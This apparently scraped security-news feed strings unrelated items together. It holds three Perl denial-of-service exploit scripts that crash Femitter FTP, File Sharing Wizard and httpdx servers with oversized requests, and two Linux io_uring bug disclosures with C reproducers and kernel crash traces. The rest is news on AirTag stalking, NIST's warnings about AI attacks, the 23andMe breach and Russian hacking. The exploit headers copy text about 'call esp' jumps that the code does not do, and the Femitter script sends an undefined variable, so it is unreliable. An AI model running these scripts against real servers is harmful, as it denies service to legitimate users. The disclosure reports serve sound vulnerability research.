Femitter FTP Server version 1.03 remote denial of service exploit.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: Femitter FTP Server 1.03 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 08 january 2024  
# Vendor Homepage:  https://acritum.com/  
# Download to demo: https://drive.google.com/file/d/1GBFmc7tMavA9mMoZPYVlUVUe62dGjBhF/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: Femitter FTP Server 1.03  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1n_WzyNiOwHRen60en5rh56Q4AyDfVbF_/view?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the command RETR, resulting in memory corruption.  
#When authenticating to the FTP server with a long RETR or a RETR with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41\x2C\x41\x20\x42"x500;

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Could not connect: $@";

    my $sc= "A"x800;

    $ftp->login("anon","anon") or die "Failed: " . $ftp->message;

    $ftp->quot("RETR ".$c."\r\n") or die "Error: " . $ftp->message;  
    $ftp->quot("RETR ".$c."\r\n") or die "Error: " . $ftp->message;

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "######################################################################\n";  
      print "#                Femitter FTP Server 1.03 - Denial of Service        #\n";  
      print "#                                                                    #\n";  
      print "#                       Coded by Fernando Mengali                    #\n";  
      print "#                                                                    #\n";  
      print "#                 e-mail: fernando.mengalli\@gmail.com                #\n";  
      print "#                                                                    #\n";  
      print "######################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

Femitter FTP Server 1.03 Denial Of Service

Linux versions 6.4 and above suffer from an io_uring page use-after-free vulnerability via buffer ring mmap.

    Linux >=6.4: io_uring: page UAF via buffer ring mmapSince commit c56e022c0a27 (\"io_uring: add support for user mapped providedbuffer ring\"), landed in Linux 6.4, io_uring makes it possible to allocate,mmap, and deallocate \"buffer rings\".A \"buffer ring\" can be allocated withio_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocatedwith io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...).It can be mapped into userspace using mmap() with offsetIORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MMsubsystem will treat the mapping as a set of opaque page frame numbers notassociated with any corresponding pages; this implies that the calling code isresponsible for ensuring that the mapped memory can not be freed before theuserspace mapping is removed.However, there is no mechanism to ensure this in io_uring: It is possible tojust register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and thenfree the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving freepages mapped into userspace, which is a fairly easily exploitable situation.reproducer:==============================================================#define _GNU_SOURCE#include <unistd.h>#include <err.h>#include <string.h>#include <stdio.h>#include <ctype.h>#include <sys/syscall.h>#include <sys/mman.h>#include <linux/io_uring.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})int main(void) {  struct io_uring_params params = {    .flags = IORING_SETUP_NO_SQARRAY  };  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));  printf(\"uring_fd = %d\\", uring_fd);  struct io_uring_buf_reg reg = {    .ring_entries = 1,    .bgid = 0,    .flags = IOU_PBUF_RING_MMAP  };  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));  void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));  printf(\"pbuf mapped at %p\\", pbuf_mapping);  struct io_uring_buf_reg unreg = { .bgid = 0 };  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));  while (1) {    memset(pbuf_mapping, 0xaa, 0x1000);    usleep(100000);  }}==============================================================When run on a system with the debug options:    CONFIG_PAGE_TABLE_CHECK=y    CONFIG_PAGE_TABLE_CHECK_ENFORCED=y, this will splat with the following error, when __page_table_check_zero()detects that a page that's being freed is still mapped into userspace:==============================================================------------[ cut here ]------------kernel BUG at mm/page_table_check.c:146!invalid opcode: 0000 [#1] PREEMPT SMP KASANCPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014RIP: 0010:__page_table_check_zero+0x136/0x150Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ffRSP: 0018:ffff888029aa7c70 EFLAGS: 00010202RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13eR10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000FS:  00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0PKRU: 55555554Call Trace: <TASK>[...] free_unref_page_prepare+0x282/0x450 free_unref_page+0x45/0x170 __io_remove_buffers.part.0+0x38c/0x3c0 io_unregister_pbuf_ring+0x146/0x1e0[...] __do_sys_io_uring_register+0xa03/0x11c0[...] do_syscall_64+0x43/0xf0 entry_SYSCALL_64_after_hwframe+0x6e/0x76RIP: 0033:0x7f745ef4bf59Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001abRAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000 </TASK>Modules linked in:---[ end trace 0000000000000000 ]---==============================================================When run on a system without those options, this reproducer will randomlycorrupt memory and probably on most runs crash the machine.I tried it once and after I tried using some other programs, I got some randomkernel #GP fault.One way to fix this might be to add some mapping counter to`struct io_buffer_list`, and then: - increment that counter in io_uring_validate_mmap_request() for PBUF_RING   mappings - increment that counter in the vm_area_operations ->open() handler - decrement that counter in the vm_area_operations ->close() handler - refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?Or alternatively free the io_buffer_list when the counter drops to zero, and letthe counter start at 1.(I'm not sure what the lifetime rules for other accesses to the io_buffer_list'smemory are - it looks like most paths only access the io_buffer_list under somelock? Is the idea that the kernel actually accesses the buffer through userspacepointers, or something like that? I'll have to stare at this some more before Iunderstand it...)This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-02-26.Found by: jannh@google.com

Linux 6.4 io_uring Use-After-Free

__io_uaddr_map() in io_uring suffers from dangerous handling of the multi-page region.

    io_uring: __io_uaddr_map() handles multi-page region dangerously__io_uaddr_map() wants to import a region from userspace, and then address theimported region through the linear mapping area. This requires that theimported region is physically contiguous.A comment in __io_uaddr_map() explains that the imported region is usuallyjust a single page, in which case that is trivially fine.However, __io_uaddr_map() also has code intended to permit multi-page regions,in which case it tries to enforce that the entire region maps to the samefolio (in other words, the same head page):        /*         * Should be a single page. If the ring is small enough that we can         * use a normal page, that is fine. If we need multiple pages, then         * userspace should use a huge page. That's the only way to guarantee         * that we get contigious memory, outside of just being lucky or         * (currently) having low memory fragmentation.         */        if (page_array[0] != page_array[ret - 1])                goto err;This code is wrong for (more or less) two reasons:1. It only checks the first and last page; it doesn't check any of the pages   in between. Userspace can easily create a set of adjacent VMAs such that   the first and last virtual page map to the same physical page, while pages   in between map to entirely unrelated pages.2. It misunderstands how compound pages are represented in the kernel, and   will always reject the case it is supposed to allow:   `pin_user_pages_fast()` would return a set of adjacent `struct page`   instances that are associated with the same head page / folio; it   wouldn't return the same `struct page *` for every subpage.   Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page`.So if this code is presented with a userspace region of the following shape,containing individual 4K pages:[page A][page B][...][page A]then it will accept the region and assume that `page_to_virt(<page A>)`returns the address of a page as big as the entire region. Accesses to thefirst 4KiB of the region would work as intended; but accesses to later partsof the region will be out-of-bounds accesses to unrelated pages.Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until itoverruns the end of the first sq page:```#define _GNU_SOURCE#include <unistd.h>#include <err.h>#include <stdio.h>#include <sys/mman.h>#include <sys/syscall.h>#include <linux/io_uring.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})#define NUM_SQ_PAGES 4int main(void) {  int memfd_sq = SYSCHK(memfd_create(\"\", 0));  int memfd_cq = SYSCHK(memfd_create(\"\", 0));  SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000));  SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000));  // sq  void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0));  SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0));  // cq (rings)  void *cq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0));  *(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES;  for (int i=1; i<NUM_SQ_PAGES; i++)    SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0));  struct io_uring_params params = {    .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/,    .sq_off = {      .user_addr = (unsigned long)sq_data    },    .cq_off = {      .user_addr = (unsigned long)cq_data    }  };  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params));  printf(\"uring_fd = %d\\", uring_fd);  /* submit nops */  int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL));  printf(\"enter returned %d\\", enter_res);}```It gives an ASAN splat like this (but note that the splat diagnostic is wrong because ASAN can't detect page OOB access properly):```[   73.380288] ==================================================================[   73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00[   73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708[   73.383967] [   73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357[   73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014[   73.386778] Call Trace:[   73.387177]  <TASK>[   73.387520]  dump_stack_lvl+0x4a/0x80[   73.388117]  print_report+0xcf/0x670[...][   73.389595]  kasan_report+0xd8/0x110[...][   73.391954]  io_submit_sqes+0x223/0xc00[   73.392570]  __do_sys_io_uring_enter+0x965/0x1200[...][   73.397438]  do_syscall_64+0x46/0xf0[   73.398004]  entry_SYSCALL_64_after_hwframe+0x6e/0x76[   73.398787] RIP: 0033:0x7ff8ed2e7989[   73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48[   73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa[   73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989[   73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005[   73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100[   73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0[   73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000[   73.419272]  </TASK>[removed irrelevant alloc/free traces of the accessed memory region][   73.449202] [   73.449471] The buggy address belongs to the object at ffff88810263a000[   73.449471]  which belongs to the cache kmalloc-128 of size 128[   73.451228] The buggy address is located 0 bytes inside of[   73.451228]  freed 128-byte region [ffff88810263a000, ffff88810263a080)[   73.453173] [   73.453429] The buggy address belongs to the physical page:[   73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a[   73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0[   73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2)[   73.457522] page_type: 0xffffffff()[   73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002[   73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000[   73.460305] page dumped because: kasan: bad access detected[   73.461091] [   73.461353] Memory state around the buggy address:[   73.462038]  ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[   73.463058]  ffff888102639f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[   73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb[   73.465289]                    ^[   73.465791]  ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc[   73.466795]  ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb```I'm not sure about the best way to fix it - since the compound page supportcan't actually have worked, as explained above, maybe it's easiest to justdrop support for compound pages? \u03bfr alternatively we could fix that, but sincenobody seems to have used it, that'd maybe be unnecessary complexity...This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-02-22.Related CVE Numbers: CVE-2023-6560.Found by: jannh@google.com

io_uring __io_uaddr_map() Dangerous Multi-Page Handling

Apple may be found negligent in an Airtags stalking lawsuit, but it has made improvements that may help potential victims

Each year, an estimated 13.5 million people in the US are victim to stalking. This is a worrying fact stated in the introduction of a lawsuit against Apple brought by stalking victims who charge that AirTags empowered their abusers.

AirTags are marketed as trackers that allow you to easily find lost belongings like keys and luggage. If you lose an object, you can find the AirTag in the Find My app on another Apple device. The tracker transmits its location via Ultra Wideband technology which is more accurate than Bluetooth when it comes to determining exact location. Since the tracker shares its location with the Apple devices of others, you can also find your AirTag over large distances.

AirTags are relatively cheap ($29), small (1.29”/3.19 cm) and can run for about a year before they need the battery replaced. This makes them an ideal tool for stalkers—they just need to attach one to something that they expect you to keep with you.

An important part of a negligence claim is whether the manufacture could have foreseen the issue—in this case, the stalking issue. This shouldn’t be a problem since lots of people were screaming from the rooftops that Apple was basically putting out a product for stalkers.

From the suit:

> “Prior to and upon the AirTag’s release, advocates and technologists urged the company to rethink the product and to consider its inevitable use in stalking. In response, Apple heedlessly forged ahead, dismissing concerns and pointing to mitigation featured that it claimed rendered the devices ‘stalker proof.'”

One plaintiffs’ lawyer argued that Apple did not make it possible, at the time the victim was stalked, for people being followed to locate an unwanted AirTag.

When the judge asked what Apple could have done better, the lawyer acknowledged that Apple has since made many fixes, but victims should have been alerted they were being subjected to unwanted tracking more quickly.

**How do the improvements Apple made help victims?**

Since AirTags were introduced, Apple has made some changes that can help potential stalking victims.

The most important one is that someone is now able to find out if an AirTag that they don’t own is moving with them over time.

On iPhones and iPads this is enabled by default, but it doesn’t hurt to check, especially if somoene may have had access to your device.

To make sure these options are enabled:

*   Go **to Settings** **\> Privacy & Security** > **Location Services**: Location Services should be on
*   Under **Location Services** > **System Services** > **Find My iPhone/iPad**: Significant Locations should be on.
*   Under **Settings** you also need to make sure you’re not in **Airplane Mode** and **Bluetooth** is on.
*   Open the **Find My** app, open the **Me** tab, and make sure **Tracking Notifications** are turned on.

If an unknown AirTag is following you, you’ll see an alert like this:

In the Find My app, you’ll be able to see how long the AirTag has been with you and you can use the Play Sound option to have the tracker emit a noise, which can help you find it.

For Android owners, Google has created a similar anti-stalking feature. Please note that the path to find the appropriate settings may vary with vendors and Android versions, but this should give you a good idea:

*   Select **Settings** \> **Safety and emergency** \> **Unknown tracker alerts**. Here you can allow alerts and do a manual scan for nearby trackers.

An unknown tracker alert is sent when someone else’s tracker device is separated from them and detected to be traveling with you and out of Bluetooth range from the owner. You can trigger any found AirTag to make a sound and you’ll be able to see how long it’s been with you on a map.

There are plans to broaden the scope of the tracker alerts besides AirTags. Companies including Samsung, Tile, Chipolo, Eufy, and Pebblebee have expressed interest in supporting this technology.

We’ll keep an eye on the lawsuit and let you know how it progresses.

 AirTags stalking lawsuit alleges Apple&#8217;s negligence in protecting victims 

The U.S. National Institute of Standards and Technology (NIST) is calling attention to the privacy and security challenges that arise as a result of increased deployment of artificial intelligence (AI) systems in recent years.
“These security and privacy challenges include the potential for adversarial manipulation of training data, adversarial exploitation of model vulnerabilities to

Artificial Intelligence / Cyber Security

The U.S. National Institute of Standards and Technology (NIST) is calling attention to the privacy and security challenges that arise as a result of increased deployment of artificial intelligence (AI) systems in recent years.

"These security and privacy challenges include the potential for adversarial manipulation of training data, adversarial exploitation of model vulnerabilities to adversely affect the performance of the AI system, and even malicious manipulations, modifications or mere interaction with models to exfiltrate sensitive information about people represented in the data, about the model itself, or proprietary enterprise data," NIST said.

As AI systems become integrated into online services at a rapid pace, in part driven by the emergence of generative AI systems like OpenAI ChatGPT and Google Bard, models powering these technologies face a number of threats at various stages of the machine learning operations.

These include corrupted training data, security flaws in the software components, data model poisoning, supply chain weaknesses, and privacy breaches arising as a result of prompt injection attacks.

"For the most part, software developers need more people to use their product so it can get better with exposure," NIST computer scientist Apostol Vassilev said. "But there is no guarantee the exposure will be good. A chatbot can spew out bad or toxic information when prompted with carefully designed language."

The attacks, which can have significant impacts on availability, integrity, and privacy, are broadly classified as follows -

*   Evasion attacks, which aim to generate adversarial output after a model is deployed
*   Poisoning attacks, which target the training phase of the algorithm by introducing corrupted data
*   Privacy attacks, which aim to glean sensitive information about the system or the data it was trained on by posing questions that circumvent existing guardrails
*   Abuse attacks, which aim to compromise legitimate sources of information, such as a web page with incorrect pieces of information, to repurpose the system's intended use

Such attacks, NIST said, can be carried out by threat actors with full knowledge (white-box), minimal knowledge (black-box), or have a partial understanding of some of the aspects of the AI system (gray-box).

The agency further noted the lack of robust mitigation measures to counter these risks, urging the broader tech community to "come up with better defenses."

The development arrives more than a month after the U.K., the U.S., and international partners from 16 other countries released guidelines for the development of secure artificial intelligence (AI) systems.

"Despite the significant progress AI and machine learning have made, these technologies are vulnerable to attacks that can cause spectacular failures with dire consequences," Vassilev said. "There are theoretical problems with securing AI algorithms that simply haven't been solved yet. If anyone says differently, they are selling snake oil."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

NIST Warns of Security and Privacy Risks from Rapid AI System Deployment

File Sharing Wizard version 1.5.0 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: File Sharing Wizard 1.5.0 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 07 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/13fs9IHSaGQ27YIQNDyrQV20jCT7owPQ6/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: File Sharing Wizard 1.5.0  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1gPiMU0Wemdx-rxEzAPhQCyparn1JiX0j/view?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server did not properly handle request with large amounts of data via method GET to web server.  
#The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $exploit = "\x41"x1360;

    my $payload_header  = "GET " . $exploit;  
    $payload_header .= " HTTP/1.0\r\n\r\n";

    my $connect = IO::Socket::INET->new(  
       PeerAddr => $ip,  
       PeerPort => $port,  
       Proto    => 'tcp'  
    ) or die "Unable to connect to the victim: $!\n";

    $connect->send($payload_header);  
    close $connect;

    print "[+] Done! Exploited!\n";

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print "#################################################################\n";  
      print "#           File Sharing Wizard 1.5.0 - Denied of Service       #\n";  
      print "#                                                               #\n";  
      print "#                Coded by Fernando Mengali                      #\n";  
      print "#                                                               #\n";  
      print "#              e-mail: fernando.mengalli\@gmail.com             #\n";  
      print "#                                                               #\n";  
      print "#################################################################\n";  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

File Sharing Wizard 1.5.0 Denial Of Service

httpdx version 1.5.4 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: httpdx 1.5.4 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 06 january 2024  
# Vendor Homepage:  http://httpdx.sourceforge.net  
# Download to demo: https://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/  
# Download 2 to demo:https://drive.google.com/file/d/1Slsd7qCPom4uoSPXdiONS4xh-8tp4fkV/view?usp=sharing  
# Notification vendor: No reported  
# Tested Version: httpdx 1.5.4 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)  
# Vídeo: https://drive.google.com/file/d/1hGn5AZbtVTzA_oiZPZ9yOVzIBVzKYGhQ/view?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The web server does not correctly handle the amount of data or bytes sent.  
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

   my $sock = IO::Socket::INET->new("$ip:$port");

   my $exploit = "\x41"x1040;

   print $sock "POST /index2.html HTTP/1.0\r\n" .   
    "Content-Length: 1023\r\n" .   
    "Content-Type: html\r\n" .   
    "Host: $ip" . "\r\n" .  
    "\r\n" .  
    $exploit;

                print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

      ---------- # ------------------------------------------------------------------  
      --------- ##= -------------- [+] httpdx 1.5.4 - Denied of Service (DoS) -------  
      -------- ##=== ----------------------------------------------------------------  
      ------ ###==#=== --------------------------------------------------------------  
      ---- ####===##==== ------------------------------------------------------------  
      -- #####====###===== -----          Coded by Fernando Mengali             -----  
      - #####=====####===== -----        fernando.mengalli@gmail.com            -----  
      - #####=====####===== ---------------------------------------------------------  
      --- ####=  #  #==== --------    Prepare to exploiting the server   ------------  
      --------- ##= -----------------------------------------------------------------  
      ------- ####=== ---------------------------------------------------------------

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

httpdx 1.5.4 Denial Of Service

Plus: Russia hacks surveillance cameras as new details emerge of its attack on a Ukrainian telecom, a Google contractor pays for videos of kids to train AI, and more.

It’s been nearly two years since Russia’s invasion of Ukraine, and as the grim milestone looms and winter drags on, the two nations are locked in a grueling standoff. In order to “break military parity” with Russia, Ukraine’s top general says that Kyiv needs an inspired military innovation that equals the magnitude of inventing gunpowder to decide the conflict in the process of advancing modern warfare.

If you made some New Year’s resolutions related to digital security (it’s not too late!), check out our rundown of the most significant software updates to install right now, including fixes from Google for nearly 100 Android bugs. It’s close to impossible to be completely anonymous online, but there are steps you can take to dramatically enhance your digital privacy. And if you’ve been considering turning on Apple’s extra-secure Lockdown Mode, it’s not as hard to enable or as onerous to use as you might think.

If you’re just not quite ready to say goodbye to 2023, take a look back at WIRED’s highlights (or lowlights) of the most dangerous people on the internet last year and the worst hacks that upended digital security.

But wait, there's more! Each week, we round up the security and privacy news we didn’t break or cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

23andMe said at the beginning of October that attackers had infiltrated some of its users' accounts and abused this access to scrape personal data from a larger subset of users through the company's opt-in social sharing service known as DNA Relatives. By December, the company disclosed that the number of compromised accounts was roughly 14,000 and admitted that personal data from 6.9 million DNA Relatives users had been impacted. Now, facing more than 30 lawsuits over the breach—even after tweaking its terms of service to make legal claims against the company more difficult—the company said in a letter to some individuals that “users negligently recycled and failed to update their passwords following … past security incidents, which are unrelated to 23andMe.” This references 23andMe’s long-standing assessment that attackers compromised the 14,000 user accounts through “credential stuffing,” the process of accessing accounts using usernames and passwords compromised in other data breaches from other services that people have reused on multiple digital accounts. “Therefore, the incident was not a result of 23andMe’s alleged failure to maintain reasonable security measures,” the company wrote in the letter.

“Rather than acknowledge its role in this data security disaster, 23andMe has apparently decided to leave its customers out to dry while downplaying the seriousness of these events,” Hassan Zavareei, one of the lawyers representing victims who received the letter, told TechCrunch. “23andMe knew or should have known that many consumers use recycled passwords and thus that 23andMe should have implemented some of the many safeguards available to protect against credential stuffing—especially considering that 23andMe stores personal identifying information, health information, and genetic information on its platform.”

Russia’s war—and cyberwar—in Ukraine has for years produced novel hybrids of hacking and physical attacks. Here’s another: Ukrainian officials this week said that they had blocked multiple Ukrainian civilians’ security cameras that had been hacked by the Russian military and used to target recent missile strikes on the capital of Kyiv. Ukraine’s SBU security service says the Russian hackers went so far as to redirect the cameras and stream their footage to YouTube. According to the SBU, that footage then likely aided Russia’s targeting in its bombardment on Tuesday of Kyiv, as well as the Eastern Ukrainian city of Kharkiv, with more than a hundred drones and missiles that killed five Ukrainians and injured well over a hundred. In total, since the start of Russia’s full-scale invasion of Ukraine in February 2022, the SBU says it’s blocked about 10,000 security cameras to prevent them from being hijacked by Russian forces.

Last month, a Russian cyberattack hit the telecom firm Kyivstar, crippling phone service for millions of people across Ukraine and silencing air raid warnings amid missile strikes in one of the most impactful hacking incidents since Russia’s full-scale invasion began. Now, Illia Vitiuk, the cyber chief of Ukraine’s SBU security service, tells Reuters that the hackers accessed Kyivstar’s network as early as March 2023 and laid in wait before they “completely destroyed the core” of the company in December, wiping thousands of its machines. Vitiuk added that the SBU believes the attack was carried out by Russia’s notorious Sandworm hacking group, responsible for most of the high-impact cyberattacks against Ukraine over the last decade, including the NotPetya worm that spread from Ukraine to the rest of the world to cause $10 billion in total damage. In fact, Vitiuk claims that Sandworm attempted to penetrate a Ukrainian telecom a year earlier but the attack was detected and foiled.

